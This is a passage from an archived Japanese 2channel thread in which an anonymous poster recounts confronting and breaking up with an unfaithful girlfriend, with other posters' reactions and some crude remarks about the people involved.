ありがたくて涙出そう。
K先輩「さっきSの顔見たとき捨てられた猫みたいな顔してた。」
どんな顔ですか。

220 :408 ◆efUlhfnBmw :2007/01/20(土) 22:17:02 ID:Mx4ki2S00
喫茶店を後にして、Eのアパートへ。
Eは自分の顔を見ると笑顔だったが、K先輩が後ろに居るのを確認すると
何で?って顔に。とりあえず話を始める。
自分「こういう形になったのは、Eには自覚してもらう為。」
E「何?」
自分「今回のEの浮気で自分はもうEの事は嫌いになった。でもその後も
   Eはメールしてきたりまったく変わってない。どういうつもり?」
E「Lとはもう会わないし、何もないのにどうして許してくれないの?」
どうすればいいんだ自分。
自分「いや、それって当たり前の事。EはLの愛人でいいって言ったでしょ。」
E「だから、あれはそう言えばLが喜ぶから!って前から言ってる!」
自分「だから、Lとは体の関係があった訳だよね。それが自分は許せないっての!」
E「だったら、どうすれば許してくれるの!」
自分「許せないって!EはLの事好きなんだろ?」
E「Sの事大好きだもん!愛しているもん!」
なぜここまで空々しく聞こえるのでしょうか?
自分「Lと寝た事こうやってうじうじ言っている自分なんか嫌いだろ?
   これからはLでも他の男でもいいから愛してくれ。自分はもういいから。」
このあたりはもうループしまくり。

221 :恋人は名無しさん:2007/01/20(土) 22:20:27 ID:9/Bw3fKAO
wktk

222 :408 ◆efUlhfnBmw :2007/01/20(土) 22:22:30 ID:Mx4ki2S00
今まで聞き役に回っていたK先輩が口を開く
K先輩「ちょっと言いにくい事聞くけど、EどうしてLと寝るまでになったの?」
確かにその辺全く聞いてませんでした。
Eちょこちょこ話し始めます。
E「Rと結婚するって話をLから聞いた頃・・・」
そんな頃?
E「Lが「俺はRを幸せにできるんだろうか?」って相談受けて・・」
何それ?
E「私も、そんな話を聞いていたら、Sに幸せにしてもらえるのかなぁって不安になってきて。」
そう思っていたんだけど。
E「Lが「俺に自信をつけさせてくれ」って迫ってきたの。」
自分「何それ?そんなんで?」
E「何度もする内、私も満たされるようになって・・・」
何回もしてるのね。
自分「だったらそのままLと付き合えよ!自分関係ないやん!」
K先輩も「あちゃー」って顔してる。
E「でも、SにLとの関係が知れた時にLの幸せを私が壊してしまったら
  相談された意味なくなっちゃうんじゃないかって・・・」
K先輩「E、そんなんあんたが壊さなくてもLがそのうち壊していたよ。
    それ以前にあんた、Sの事はどうだったの?」
既に壊れてますけど。と言うかK先輩怖い。
K先輩「ここに来る前にSに会ったとき、Sどんな顔していたと思う?
    捨てられた猫みたいに悲しそうだったよ。」
また自分は猫ですか。と言うかK先輩猫好き?

223 :恋人は名無しさん:2007/01/20(土) 22:28:47 ID:QSx7BS/nO
私怨

224 :408 ◆efUlhfnBmw :2007/01/20(土) 22:29:22 ID:Mx4ki2S00
K先輩「弱音吐かないSが相談しに来るんだよ?Sどれだけ苦しんでいるか分かる?」
スレ住人に背中押されたとは口が裂けても言えない。
K先輩「Eさぁ、Sに幸せにしてもらえるか?って贅沢だよ。こんなにEの事
    想っていてくれたSに失礼だよ。」
聞くだけと言っていたK先輩怒ってる。
K先輩「さっきから話していても、あんた一度も「ごめんなさい」って言ってないじゃん。
    何考えているのE?浮気したあんたが何で「ごめんなさい」って言わないの?」
E「S・・・私と別れてK先輩と・・・」
ば・・・馬鹿だ・・・何こいつ?
自分「何でそうなる!どこ考えたらそういう邪推ができる!謝れ!」
E「だってS、私と別れたがってる・・・」
自分「今ごろ気付いた!もういや!顔も見たくない!嫌い!」
完璧にキレたと言うかどっちかといえばだだっこモードな自分。
K先輩「とにかくSはLと浮気したEは許せないって言ってるんだよ。」
E「いやです。許してください・・・もうLとは会いませんから・・・」
自分「Lと会う会わないが問題じゃないの!浮気をするEが許せないの!」
E「何でも言う事聞きます。だから・・・」
自分「だったら別れて。今後一切の付き合いなくして。」
E「好きでいさせて下さい・・・・お願い・・・」
自分「ごめん。無理だから。他の良い人見つけて。」
E「・・・・・・・」
自分「さようなら、今からもう他人だから。」
Eは座り込んでブルブル震えてました。(泣き崩れてた?)


225 :恋人は名無しさん:2007/01/20(土) 22:30:01 ID:gdvFre9P0
ttp://youtube.com/watch?v=ZhY5yslRHjA
ここで資料

226 :408 ◆efUlhfnBmw :2007/01/20(土) 22:34:16 ID:Mx4ki2S00
K先輩と二人でアパートを出ました。
自分「先輩すみません。最後はぐだぐだになっちゃいました。」
RとかK先輩とか自分謝ってばっかだな。
K先輩「結局私も口出したし・・Eから又何かあるようだったら言ってね。
    最悪女同士で喧嘩になるかもしれないけど。」
自分「さて、後はLか・・・」
K先輩「Lとも話すの?もうやめとき。逆に何かされたらやられ損やん。」
自分「はぁ・・・やっぱそう思います?」
K先輩「もうEともけりついたし・・・それなら土曜にごはん食べる?」
自分「ごはんですか?」
K先輩「土曜後輩の娘に料理教えてもらうから試食係でw」
自分「わかりました。でもT先輩は・・・」
K先輩「あれは黙々と食べてるだけだから作り甲斐が無いので面白くない。」
T先輩もK先輩に甘えた方がいいかも。(おまえが言うな)

227 :恋人は名無しさん:2007/01/20(土) 22:37:46 ID:QSx7BS/nO
次は寝取る番か

228 :408 ◆efUlhfnBmw :2007/01/20(土) 22:39:30 ID:Mx4ki2S00
とりあえずおわり。

しかし、抱かれるまでの理由がこんな阿呆な話だったとは泣きたい。

>225
GJ
こんなに可愛いぬこじゃないけどな。

229 :恋人は名無しさん:2007/01/20(土) 22:39:32 ID:IReQjOw/0
T先輩に黙々と食われる408

230 :恋人は名無しさん:2007/01/20(土) 22:41:00 ID:9/Bw3fKAO
Rはどうなったんだ?

231 :恋人は名無しさん:2007/01/20(土) 22:41:20 ID:gdvFre9P0
Rと会った話もkwsk!

232 :恋人は名無しさん:2007/01/20(土) 22:43:57 ID:PMTAnWyq0
ようやく話が通じてよかったな。乙乙GJ。
Rとの話はゆっくりでいいよ。
これからいいことがたくさんあるといいな。

233 :恋人は名無しさん:2007/01/20(土) 22:44:02 ID:WKzmCkuHO
Lの破滅理由をKWSK

234 :恋人は名無しさん:2007/01/20(土) 22:45:58 ID:jSzRXFFK0
sien

235 :恋人は名無しさん:2007/01/20(土) 23:17:56 ID:uWnz1w3r0
とりあえず結婚には幸せにしてほしい、幸せにしてあげたいっていう気持ちが両方とも、
双方にちゃんとあることが大事だってよく分かる話ですな。

236 :408 ◆efUlhfnBmw :2007/01/20(土) 23:19:05 ID:Mx4ki2S00
ごめん>225の辺のぬこ映像みて和んでいたw

Rとは電話で話しただけです。ここからの話はちょっとぼかします。
Rは最初はEとの浮気だけならもう許そうという気になっていたそうです。こっち的には勘弁ですけど。
今回の件で自分の周りに情報が流れたのがLにはまずかった模様。
つまり「愛人」はEだけじゃなかった。LとRの結婚で愛人でいいやと思っていた女が
Rと揉めてる>婚約無効?>アテクシが愛人から昇格できる?>Rに「Lと別れて」w
しかも1人でなく・・・さすがにEは居なかった模様。
で、完全に愛想尽きたそうでL宅に結婚婚約破棄。今回の件の一切の費用負担+慰謝料だそうです。
L親(母)がもう完全にブチしてLは会社辞めて遠くの親戚に預けられてそこから詳しくは知らんですが
(Rも詳しく聞いてない)何かのセミナー?講習?合宿?修行?にぶちこまれているらしいです。

今度はバレンタインの前に試作品の試食を頼まれたので(K先輩とK先輩の後輩(自分にとっては先輩))
ちょっと楽しみです。

これで修羅場スレとはさよならです。まぁちょっとひきずってますけどね。
今度はのろけれるスレの方にでも行きたい。あるいは毒男板かもorz

237 :恋人は名無しさん:2007/01/20(土) 23:22:10 ID:QSx7BS/nO
セミナー気になるw

238 :恋人は名無しさん:2007/01/20(土) 23:25:29 ID:gdvFre9P0
ヤマギシズムとか?

239 :恋人は名無しさん:2007/01/20(土) 23:44:46 ID:hYr5sLgT0
勝利!勝利!大勝利!

240 :恋人は名無しさん:2007/01/20(土) 23:45:42 ID:jSzRXFFK0
408乙

これで身辺が静かになるといいな。


241 :恋人は名無しさん:2007/01/21(日) 02:22:30 ID:XyTB392Y0
自分の駄目っぷりを上手く活用して頭のネジが緩い女を口説くだけが能な男が、結局自滅しただけの話か。
因果応報。
巻き込まれたRと408は良い迷惑だったけど、
人生の分岐点でそんな連中と手を切ることができた、と思えるようになると良いな。

242 :恋人は名無しさん:2007/01/21(日) 02:29:50 ID:zITGfYFTO
EはLに愛人達が複数いることを知っていたのだろうか
知らなければ教えてあげて失意のどん底に落としてやるべき


243 :恋人は名無しさん:2007/01/21(日) 02:34:23 ID:XyTB392Y0
>>242
それを聞いたEが、何を連想するか分からんぞ。

「Sが自分から連絡してきてくれた。
 必死になってLの悪口なんか言っちゃって。
 心配しなくても今はS一筋だよ(ハート)」

とか考えだすかもな。

244 :恋人は名無しさん:2007/01/21(日) 02:46:04 ID:gUfUGOVW0
そこでK先輩ですよ。
彼女なら世間話をしつつ、うまく伝えてくれるでしょうw

245 :恋人は名無しさん:2007/01/21(日) 02:51:32 ID:6/I3vgVe0
Eって頭がおかしいのかな。
それとも、話が通じないフリをしてるだけ?そうしてるうちになぁなぁに元鞘になれるかも、とか思って。

246 :恋人は名無しさん:2007/01/21(日) 03:37:39 ID:zDLsGuDWO
408お疲れ
Eの発言はなんなんだ?腹立たしい。
408の気持ちなんぞ、全く考えてない。

結婚まで考えてた女の本性がわかって、辛いよな…。
お前が幸せになるよう祈るよ。

247 :恋人は名無しさん:2007/01/21(日) 05:03:13 ID:zxEe7Nj20
女の先輩を連れて行ったのは少し迂闊だったな。
このバカ女の脳みそじゃ誤解曲解するのは目に見えてるから。

248 :恋人は名無しさん:2007/01/21(日) 06:43:54 ID:7dDvCN6b0
理想を言えば、K先輩とT先輩の双方についてきてもらえば良かったね。
Eに関しては、何を言っても都合のいいようにしか取らなそうなので放置するしかないな。
結局、浮気の件に対して何も謝ってないし。
『浮気は男の甲斐性』と言い出したLに相応しく、『浮気は女の勲章』とでも思ってたのかよ・・・・・・。

249 :恋人は名無しさん:2007/01/21(日) 07:55:59 ID:/rcOvRwf0
浮気・不倫“して”スレより
>した側にとっては、ばれてプリと縁切った(不倫・浮気をやめた)時点で「この件は終わったこと」になっている。
>浮気をやめたこと自体が、自分の浮気の罪に対する等価の罰
(家庭を維持するためにお楽しみを諦めたんだから)と思っていて、
それ以降の、浮気の件で自分が不愉快に感じる事象すべてを 「理不尽な仕打ち」と感じてしまう。
>また、等価の罰はもう(浮気やめたことで)受けたと自分では思っている

Eは正にそのまんまですな。

250 :恋人は名無しさん:2007/01/21(日) 09:15:56 ID:yAZ07rJi0
>>249
怖いぐらい当てはまってるな……

251 :恋人は名無しさん:2007/01/21(日) 12:24:19 ID:9kVc89yU0
不倫関係の清算は、許してもらうための最低ラインに過ぎないんだがな。
携帯電話を差し出して、金の管理を委ねて何をしたか把握してもらうようにして、
そこまでやって初めて、信頼関係を取り戻す努力をしてる、と認めてもらえるかどうかだってのに。
考えが甘すぎる、というより根本的に倫理観が全く違う地域の人間としか思えんな、Eみたいのは。

252 :408 ◆efUlhfnBmw :2007/01/21(日) 16:49:12 ID:BI+GiA0/0
あれ?

253 :恋人は名無しさん:2007/01/21(日) 16:51:47 ID:bfzqrMhV0
>>252
なにが『あれ?』なのかkwsk

254 :408 ◆efUlhfnBmw :2007/01/21(日) 16:53:57 ID:BI+GiA0/0
ごめん間違えたorz

255 :ヤジセルリアン:2007/01/21(日) 18:49:39 ID:mfehs1ES0

Eに「Lの末席の愛人」だった事を教えてやるべし
相談と称して女食ってただけのツマラン男に騙されだ「ばーか女」と言っておやり



256 :恋人は名無しさん:2007/01/21(日) 19:05:27 ID:AvsljWkU0
でも愛人達の中でも一番大事な奴とクリスマスを過ごすんじゃないか?
クリスマスに一緒に過ごしたい奴こそが本命でしょ

257 :恋人は名無しさん:2007/01/21(日) 20:28:36 ID:4zCY3zgF0
愛人の本命などたかが知れてる

258 :恋人は名無しさん:2007/01/21(日) 22:04:32 ID:r2FsT/gp0
>>256
なるほど、うっかりEと会ってしまったらそう言って持ち上げてやりLに押し付けるのですね

259 :恋人は名無しさん:2007/01/21(日) 22:30:10 ID:l2nskVBa0
押し付けようにもLはどこかに山ごもりして修行中でしょ。
そのまま頭を丸めて世間とは縁を切ったりしてなw

260 :恋人は名無しさん:2007/01/21(日) 22:51:53 ID:zxEe7Nj20
チンコちょん切っちゃえばいいのに

261 :恋人は名無しさん:2007/01/21(日) 23:12:08 ID:t/JCbNJX0
「浮気は男の甲斐性だ」と言い放ったL親が
ブチ切れるくらいだから、相当ひどかったんだろうな、Lの素行。

262 :恋人は名無しさん:2007/01/22(月) 00:27:48 ID:jj50UAMh0
LとEほどお似合いのカップルはないと思う
DQN同士でくっつきあってててくれよ

263 :恋人は名無しさん:2007/01/22(月) 02:37:10 ID:pHpbstBy0
>Rは最初はEとの浮気だけならもう許そうと

許して結婚してたらより酷く泣かされてたんだろうなぁ。
L自爆して良かった。
友人の恋人を寝取るという行動を許そうって考えが若干引っかかるが。

264 :恋人は名無しさん:2007/01/22(月) 06:40:45 ID:VWFxrTcnO
愛人ズ全員にこの話説明して目を覚まさせてやるのがいいと思う。
阿呆な女ばかりだから目を覚ますとは限らんがな。

265 :恋人は名無しさん:2007/01/22(月) 10:00:22 ID:Oao91PME0
これくらいで目を覚ますなら最初からしてないだろう

266 :恋人は名無しさん:2007/01/22(月) 16:39:35 ID:+Itp9m/30
Lタソ変な宗教に染まってきて新たな火種にならないといいんだけどねw

267 :恋人は名無しさん:2007/01/22(月) 22:28:16 ID:C/PasCGm0
>>256
Sへの対抗心かなぁ 自分の彼女ともイブを過ごさないってある意味すごいw

268 :恋人は名無しさん:2007/01/23(火) 00:00:53 ID:lU8Q1HY20
>>267
ただ単にクリスマス前後でEを食うタイミングがちょうどイブだけだったからじゃない?
408は仕事みたいだし自分の婚約者はもう釣った魚だしあとでどうにでもフォローできると思ってたんでは?

269 :ヤジセルリアン:2007/01/23(火) 01:26:42 ID:RbbmG6cb0

Eなど糞食わせ

270 :恋人は名無しさん:2007/01/24(水) 16:33:13 ID:8aZ2jhJe0
クリスマスの朝は、玄関から部屋に上がる時別に足音忍ばせてた
わけじゃないだろうし、寝てるEもLも起きないもんかねぇ。
寝てるとこ写真も撮ってたけど、ケータイのシャッター音て
静かな部屋の中では結構大きく聞こえるものだし…。
部屋にはストーブがついてたけど、EとLはベッドの上だよね。
Rが見てすぐに状況がわかるような写真を撮るには
フラッシュが必要じゃない?
写真は複数撮ってたけど、少なくともシャッター音に
気付かないで寝てるってのはなぁ…

271 :恋人は名無しさん:2007/01/24(水) 17:05:51 ID:r439szMK0
↑馬鹿だろ
まんま音出すやついるわけねーよ

272 :恋人は名無しさん:2007/01/24(水) 18:55:09 ID:FRW8hZVZ0
携帯のカメラのシャッター音て消せるか?
俺のはどんな消音モードにしても消えない。

ていうか確かに有名なネタ師と文章似てるなw


273 :恋人は名無しさん:2007/01/24(水) 19:06:34 ID:9G7plH7f0
>>272
そういうことは黙ってるのが大人

でも、携帯のシャッター音なんかでは自分も目覚めないな
特にセクロス後の疲れ果てた後だったら特にそうかも。
相手が起きてトイレに行ったり、ご飯作り始めても起きない。
だから、そこを突っ込むのはちょっと違うかな、と。

274 :恋人は名無しさん:2007/01/24(水) 19:10:57 ID:FRW8hZVZ0
すまん
まあネタでも面白かったからいいんだけど

275 :恋人は名無しさん:2007/01/24(水) 19:59:20 ID:gq3AHGVi0
ネタじゃなかったら失礼だし
ネタだったらそれにツッコムのは無粋
煽りじゃないなら心にしまっとけ

276 :恋人は名無しさん:2007/01/24(水) 20:36:55 ID:Ewh8jAec0
隣に寝てる人間が着替えてゴソゴソして扉開けて部屋を出て行った事にも気付かず、
結局数時間後まで寝続けた事なんて何度もあるよ。
シャッター音程度で目覚めるなんて、前夜からよっぽど気を張ってなきゃ無理だな。

277 :恋人は名無しさん:2007/01/24(水) 21:03:05 ID:iYjj7JyhO
個人差があると思うよ。
俺はよっぽどの寝不足か疲れてない限り、気配だけで目が覚めるよ。

278 :恋人は名無しさん:2007/01/24(水) 21:25:47 ID:XRT/aEsr0
つーか、そんな各人の場合なんて誰も聞いてないから。

>>277
>>275

279 :恋人は名無しさん:2007/01/24(水) 23:34:48 ID:ANXgTKVI0
各々違うって事を理解してない馬鹿がいるから例えを書いたんじゃないの

280 :ヤジセルリアン:2007/01/24(水) 23:59:56 ID:z9hgrIU10

ネタと思うなら

って事さ

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)